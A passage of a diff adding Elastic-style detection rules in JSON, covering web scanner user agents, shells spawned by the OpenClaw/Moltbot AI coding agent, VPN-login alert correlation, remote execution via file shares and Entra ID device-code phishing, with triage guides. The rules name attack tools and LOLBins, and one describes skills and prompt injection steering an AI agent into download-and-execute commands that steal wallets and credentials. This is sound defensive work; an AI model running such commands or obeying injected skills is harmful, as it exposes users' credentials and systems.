agents such as \"nikto\", \"sqlmap\", \"dirsearch\", \"wpscan\", \"gobuster\", or \"burp\".\n- If traffic is proxied (CDN/reverse proxy), identify the true client via forwarded headers and extend blocks at both layers, enabling bot management or JS challenges on swept paths like /admin, /.git, /.env, /backup, and common discovery endpoints.\n- Eradicate exposure by removing or restricting access to sensitive files and directories uncovered by the scans, rotating any credentials or API keys found, invalidating active sessions, and disabling public access to administrative panels until hardened.\n- Recover by verifying no unauthorized changes or data exfiltration occurred, tuning per-IP and per-path rate limits to prevent path-sweeps while preserving legitimate traffic, and reintroducing normal rules only after fixes are deployed and stability is confirmed.\n- Escalate to incident response if sensitive files are successfully downloaded (HTTP 200/206 on /.git, /.env, or backups), any login or account creation succeeds, multiple hosts or environments are targeted, or activity persists after blocking via UA spoofing or rapid IP rotation.\n- Harden long term by enforcing WAF signatures for known scanner UAs and path patterns, denying directory listing and direct access to /.git, /.env, /backup and similar artifacts, requiring MFA/VPN for /admin and management APIs, and deploying auto-ban controls like fail2ban or mod_security.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n\n| eval Esql.user_agent_original_to_lower = to_lower(user_agent.original), Esql.url_original_to_lower = to_lower(url.original)\n\n| where\n Esql.user_agent_original_to_lower like \"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/74.0.3729.169 safari/537.36\" or // Nikto\n Esql.user_agent_original_to_lower like \"nikto*\" or // Nikto\n Esql.user_agent_original_to_lower like 
\"mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)\" or // Nessus Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*nessus*\" or // Nessus Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"sqlmap/*\" or // SQLMap\n Esql.user_agent_original_to_lower like \"wpscan*\" or // WPScan\n Esql.user_agent_original_to_lower like \"feroxbuster/*\" or // Feroxbuster\n Esql.user_agent_original_to_lower like \"masscan*\" or // Masscan & masscan-ng\n Esql.user_agent_original_to_lower like \"fuzz*\" or // Ffuf\n Esql.user_agent_original_to_lower like \"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/user_agent.original like~ 87.0.4280.88 safari/537.36\" or // Dirsearch\n Esql.user_agent_original_to_lower like \"mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)\" or // Dirb\n Esql.user_agent_original_to_lower like \"dirbuster*\" or // Dirbuster\n Esql.user_agent_original_to_lower like \"gobuster/*\" or // Gobuster\n Esql.user_agent_original_to_lower like \"*dirsearch*\" or // dirsearch\n Esql.user_agent_original_to_lower like \"*nmap*\" or // Nmap Scripting Engine\n Esql.user_agent_original_to_lower like \"*hydra*\" or // Hydra Brute Forcer\n Esql.user_agent_original_to_lower like \"*w3af*\" or // w3af Web Application Attack and Audit Framework\n Esql.user_agent_original_to_lower like \"*arachni*\" or // Arachni Web Application Security Scanner\n Esql.user_agent_original_to_lower like \"*skipfish*\" or // Skipfish Web Application Security Scanner\n Esql.user_agent_original_to_lower like \"*openvas*\" or // OpenVAS Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*acunetix*\" or // Acunetix Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*zap*\" or // OWASP ZAP\n Esql.user_agent_original_to_lower like \"*burp*\" // Burp Suite\n\n| keep\n @timestamp,\n event.dataset,\n user_agent.original,\n source.ip,\n agent.id,\n agent.name,\n Esql.url_original_to_lower,\n 
Esql.user_agent_original_to_lower,\n data_stream.namespace\n| stats\n Esql.event_count = count(),\n Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower),\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.url_original_values = values(Esql.url_original_to_lower),\n Esql.user_agent_original_values = values(Esql.user_agent_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip, agent.id\n| where\n Esql.event_count > 50 and Esql.url_original_count_distinct > 10\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.url_original_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Data Source: 
Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.001", + "name": "Scanning IP Blocks", + "reference": "https://attack.mitre.org/techniques/T1595/001/" + }, + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2.json b/packages/security_detection_engine/kibana/security_rule/a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2.json new file mode 100644 index 00000000000..c655d12053c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via OpenClaw Agent", + "note": "## Triage and analysis\n\n### Investigating Execution via OpenClaw Agent\n\nOpenClaw (formerly Clawdbot, rebranded to Moltbot) is a personal AI coding assistant that can execute shell commands \nand scripts on behalf of users. Malicious actors have weaponized the skill ecosystem (ClawHub) to distribute skills \nthat execute download-and-execute commands, targeting cryptocurrency wallets and credentials.\n\n### Possible investigation steps\n\n- Verify if OpenClaw/Moltbot is an approved application in your organization.\n- Review the child process command line for indicators of malicious activity (encoded payloads, remote downloads, credential access).\n- Check the parent Node.js process command line to identify which OpenClaw component initiated the execution.\n- Examine recently installed skills from ClawHub for malicious or obfuscated code.\n- Correlate with network events to identify data exfiltration or C2 communication.\n- Review the user's AI conversation history for prompt injection attempts.\n\n### False positive analysis\n\n- Developers legitimately using OpenClaw/Moltbot for AI-assisted coding may trigger this rule when the AI executes build scripts, curl commands, or other legitimate automation.\n- If the tool 
is approved, consider tuning based on specific command patterns or adding exception lists.\n\n### Response and remediation\n\n- If the child process activity appears malicious, terminate the OpenClaw gateway and investigate the skill that initiated the command.\n- Review and remove any suspicious skills from the OpenClaw configuration.\n- If credentials may have been accessed, rotate affected secrets and API keys.\n- Block known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the network level.\n", + "query": "process where event.type == \"start\" and\n process.parent.name : (\"node\", \"node.exe\") and \n process.parent.command_line : (\"*openclaw*\", \"*moltbot*\", \"*clawdbot*\") and\n process.name : (\"bash\", \"sh\", \"zsh\", \"bash.exe\", \"cmd.exe\", \"powershell.exe\", \"curl.exe\", \"curl\", \"base64\", \"xattr\", \"osascript\", \"python*\", \"chmod\", \"certutil.exe\", \"rundll32.exe\") and\n not process.command_line in (\"/bin/sh -c ip neigh show\", \"/usr/bin/sh -c ip neigh show\",\n \"/bin/sh -c arp -a -n -l\", \"/usr/bin/sh -c arp -a -n -l\")\n", + "references": [ + "https://www.malwarebytes.com/blog/threat-intel/2026/01/clawdbots-rename-to-moltbot-sparks-impersonation-campaign", + "https://www.tomshardware.com/tech-industry/cyber-security/malicious-moltbot-skill-targets-crypto-users-on-clawhub", + "https://blogs.cisco.com/ai/personal-ai-agents-like-openclaw-are-a-security-nightmare", + "https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": 
"keyword" + } + ], + "risk_score": 47, + "rule_id": "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "Domain: LLM", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2.json b/packages/security_detection_engine/kibana/security_rule/a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2.json new file mode 100644 index 00000000000..901087f324f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior.", + "from": "now-9m", + "index": [ + "logs-fortinet_fortigate.log-*", + ".alerts-security.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "FortiGate SSL VPN Login Followed by SIEM Alert by User", + "note": "## Triage and analysis\n\n### Investigating FortiGate SSL VPN Login Followed by SIEM Alert by User\n\nThis rule correlates a FortiGate SSL VPN login with a subsequent security alert for the same user name, highlighting possible abuse of VPN access or activity shortly after remote access.\n\n### Possible investigation steps\n\n- Review the FortiGate login event (source IP, user, time) and the SIEM alert(s) that followed for the same user.\n- Determine whether the user is expected to use VPN and whether the subsequent alert is related to legitimate work (e.g. admin tools, updates).\n- Check for other alerts or logins for the same user in the same time window to assess scope.\n- Correlate with authentication logs to identify impossible travel or credential reuse from the VPN session.\n\n### False positive analysis\n\n- Legitimate VPN users triggering detections (e.g. 
scripted tasks, admin tooling) after login.\n- Security scans or automated jobs that run in the context of a VPN-authenticated user.\n\n### Response and remediation\n\n- If abuse or compromise is suspected, disable or reset the user\u2019s VPN access and credentials.\n- Investigate the host and process associated with the SIEM alert.\n- Escalate to the security or incident response team if the alert indicates malicious activity.\n", + "query": "sequence by user.name with maxspan=10m\n [authentication where event.dataset == \"fortinet_fortigate.log\" and event.action == \"login\" and event.code in (\"0101039426\", \"0101039427\") and\n user.name != \"root\"]\n [any where event.kind == \"signal\" and kibana.alert.rule.name != null and event.dataset != \"fortinet_fortigate.log\" and\n kibana.alert.risk_score > 21 and kibana.alert.rule.rule_id != \"a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e\" and user.name != null]\n", + "references": [ + "https://attack.mitre.org/tactics/TA0001/", + "https://www.elastic.co/docs/reference/integrations/fortinet_fortigate" + ], + "related_integrations": [ + { + "package": "fortinet_fortigate", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": false, + "name": "kibana.alert.risk_score", + "type": "unknown" + }, + { + "ecs": false, + "name": "kibana.alert.rule.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "kibana.alert.rule.rule_id", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e", + "severity": "medium", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: Higher-Order Rule", + "Tactic: Initial Access", + "Data 
Source: Fortinet", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_121.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_121.json new file mode 100644 index 00000000000..b131f65b92c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_121.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Execution via File Shares", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and \n process.pid == 4 and (file.extension : (\"exe\", \"scr\", \"pif\", \"com\") or file.Ext.header_bytes : \"4d5a*\")] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n not (\n (\n process.code_signature.trusted == true and\n process.code_signature.subject_name : (\n \"Veeam Software Group GmbH\",\n \"Elasticsearch, Inc.\",\n \"PDQ.com Corporation\",\n \"CrowdStrike, Inc.\",\n \"Microsoft Windows Hardware Compatibility Publisher\",\n \"ZOHO Corporation Private Limited\",\n \"BeyondTrust Corporation\", \n \"CyberArk Software Ltd.\", \n \"Sophos Ltd\"\n )\n ) or\n (\n process.executable : (\n \"?:\\\\Windows\\\\ccmsetup\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta*.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n process.executable : \"G:\\\\SMS_*\\\\srvboot.exe\" and \n process.code_signature.trusted == true and process.code_signature.subject_name : \"Microsoft Corporation\"\n )\n )\n ] by host.id, process.executable\n", + "references": [ + "http://web.archive.org/web/20230329172636/https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html", + "https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", 
+ "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "ab75c24b-2502-43a0-bf7c-e60e662c811e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 121 + }, + "id": "ab75c24b-2502-43a0-bf7c-e60e662c811e_121", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_8.json b/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_8.json new file mode 100644 index 00000000000..dcf8ae0e1e3 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_8.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Matteo Potito Giorgio" + ], + "description": "Identifies when a user is observed for the first time authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. This rule only applies to Entra ID user types and detects new users leveraging this flow.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "filebeat-*", + "logs-azure.signinlogs-*", + "logs-azure.activitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Entra ID OAuth Device Code Grant by Unusual User", + "new_terms_fields": [ + "azure.signinlogs.properties.user_principal_name" + ], + "note": "## Triage and analysis\n\n### Investigating Entra ID OAuth Device Code Grant by Unusual User\n\nThis rule detects the first instance of a user authenticating via the DeviceCode authentication protocol within the historical window. The DeviceCode authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. 
However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access.\n\n### Possible investigation steps\n\n- Review `azure.signinlogs.properties.user_principal_name` and `azure.signinlogs.properties.user_id` to identify the user involved.\n- Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`.\n- Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is expected.\n- Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted location.\n- Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious.\n- Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider.\n- Review `azure.signinlogs.properties.applied_conditional_access_policies` and `azure.signinlogs.properties.conditional_access_status` to determine if MFA or conditional access policies were enforced or bypassed.\n- Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied.\n- Review `azure.signinlogs.properties.device_detail.browser` and `user_agent.original` to determine if the login aligns with expected device behavior.\n- Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client.\n- Check if the user recently reported phishing attempts or suspicious emails.\n- Look for recent changes in the user\u2019s account settings, including password resets, role changes, or delegation of access.\n- Review if other users in the environment have triggered similar DeviceCode authentication events within the same timeframe.\n\n### False positive analysis\n\n- If the user is setting up a new device (e.g., a smart TV or kiosk), this 
authentication may be expected.\n- Some legitimate applications or scripts may leverage the DeviceCode authentication protocol for non-interactive logins.\n- In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts.\n- If the user is traveling or accessing from a new location, confirm legitimacy before taking action.\n\n### Response and remediation\n\n- Immediately revoke any access tokens associated with this authentication event.\n- Review additional authentication logs, application access, and recent permission changes for signs of compromise.\n- Reset the affected user\u2019s credentials and enforce stricter MFA policies for sensitive accounts.\n- Restrict DeviceCode authentication to only required applications.\n- Enable additional logging and anomaly detection for DeviceCode logins.\n- If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts.\n- Limit DeviceCode authentication to approved users and applications via conditional access policies.\n", + "query": "event.dataset:(azure.activitylogs or azure.signinlogs)\n and (\n azure.signinlogs.properties.authentication_protocol:deviceCode or\n azure.signinlogs.properties.original_transfer_method:deviceCodeFlow or\n azure.activitylogs.properties.authentication_protocol:deviceCode\n )\n and event.outcome:success\n and azure.signinlogs.properties.user_type:*\n and not azure.signinlogs.properties.app_id:(\n \"29d9ed98-a469-4536-ade2-f981bc1d605e\" or\n \"d5a56ea4-7369-46b8-a538-c370805301bf\" or\n \"80faf920-1908-4b52-b5ef-a8e7bedfc67a\" or\n \"97877f11-0fc6-4aee-b1ff-febb0519dd00\" or\n \"245e1dee-74ef-4257-a8c8-8208296e1dfd\" or\n \"9ba1a5c7-f17a-4de9-a1f1-6178c8d51223\" or\n \"74bcdadc-2fdc-4bb3-8459-76d06952a0e9\" or\n \"4813382a-8fa7-425e-ab75-3b753aab3abb\" or\n \"a850aaae-d5a5-4e82-877c-ce54ff916282\"\n )\n", + "references": [ + "https://aadinternals.com/post/phishing/", + 
"https://www.blackhillsinfosec.com/dynamic-device-code-phishing/", + "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/", + "https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows", + "https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.properties.authentication_protocol", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.authentication_protocol", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.original_transfer_method", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.user_type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "af22d970-7106-45b4-b5e3-460d15333727", + "setup": "#### Required Microsoft Entra ID Sign-In Logs\nThis rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub.\n", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": 
